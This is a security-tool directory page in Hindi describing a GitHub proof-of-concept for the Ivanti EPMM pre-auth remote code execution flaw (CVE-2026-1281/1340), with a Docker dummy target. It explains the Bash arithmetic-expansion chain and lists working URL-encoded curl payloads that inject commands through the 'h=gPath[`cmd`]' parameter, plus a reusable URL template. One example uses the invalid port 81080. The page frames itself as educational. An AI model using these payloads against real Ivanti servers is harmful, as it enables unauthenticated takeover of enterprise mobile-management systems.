Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — एक सरल डेमो एप्लिकेशन जो दिखाता है कि शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को कैसे दोहराया जाए। | Kitploit
उपकरण/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

एक सरल डेमो एप्लिकेशन जो दिखाता है कि शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को कैसे दोहराया जाए।

रिपॉजिटरी देखें
3127 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ivanti EPMM प्री-ऑथ RCE डमी टारगेट

एक सरल डेमो एप्लिकेशन जो दिखाता है कि Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए कैसे पुन: उत्पन्न किया जाए।

भेद्यता अवलोकन

यह भेद्यता Bash अंकगणितीय विस्तार व्यवहार का शोषण करती है। जब किसी अन्य चर के संदर्भ वाले चर का उपयोग अंकगणितीय संदर्भ में किया जाता है, और उस संदर्भित चर में कमांड प्रतिस्थापन के साथ एक सरणी सूचकांक होता है, तो कमांड निष्पादित हो जाती है।

शोषण श्रृंखला

  1. अनुरोध में st=theValue (पैडिंग के साथ शाब्दिक स्ट्रिंग "theValue") होता है
  2. अनुरोध में h=gPath[\command`]` (सरणी सूचकांक में कमांड) होता है
  3. Bash स्क्रिप्ट लूप में key=value जोड़े पार्स करती है, प्रत्येक पुनरावृत्ति में theValue अपडेट करती है
  4. gStartTime शाब्दिक स्ट्रिंग "theValue" पर सेट होता है
  5. लूप के बाद, theValue में gPath[\command`]` होता है
  6. जब [[ ${currentTime} -gt ${gStartTime} ]] का मूल्यांकन होता है:
    • ${gStartTime} → "theValue" (स्ट्रिंग)
    • अंकगणितीय संदर्भ theValue को चर संदर्भ के रूप में मानता है
    • theValue → gPath[\command`]`
    • सरणी सूचकांक कमांड प्रतिस्थापन ट्रिगर करता है → RCE!

त्वरित प्रारंभ

# कंटेनर बनाएं और प्रारंभ करें
docker-compose up --build -d

# जांचें कि यह चल रहा है
curl http://localhost:8180/health

भेद्यता का परीक्षण

1. फ़ाइल निर्माण परीक्षण

कमांड निष्पादन साबित करने के लिए एक फ़ाइल बनाएं:

# URL-एन्कोडेड पेलोड: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# जांचें कि फ़ाइल बनाई गई थी
cat artifacts/poc

2. समय-आधारित परीक्षण

स्लीप कमांड के साथ सत्यापित करें:

# प्रतिक्रिया देने में ~5 सेकंड लगने चाहिए
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. कस्टम कमांड निष्पादन

# कस्टम सामग्री लिखें
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

URL संरचना

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ पेलोड: gPath[`COMMAND`]
                               │      │              └─ समाप्ति टाइमस्टैम्प (कोई भी 10 अंक)
                               │      └─ महत्वपूर्ण: शाब्दिक "theValue" + 2 स्थान (कुल 10 वर्ण)
                               └─ कुंजी सूचकांक (कोई भी मान)

डिबगिंग

# कंटेनर लॉग देखें
docker-compose logs -f

# कंटेनर में शेल प्राप्त करें
docker exec -it ivanti-epmm-vuln /bin/bash

# nginx त्रुटि लॉग जांचें
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

सफाई

docker-compose down
rm -rf artifacts/*

संदर्भ

  • WatchTowr Labs ब्लॉग पोस्ट

अस्वीकरण

यह केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है।

टूल डाउनलोड करें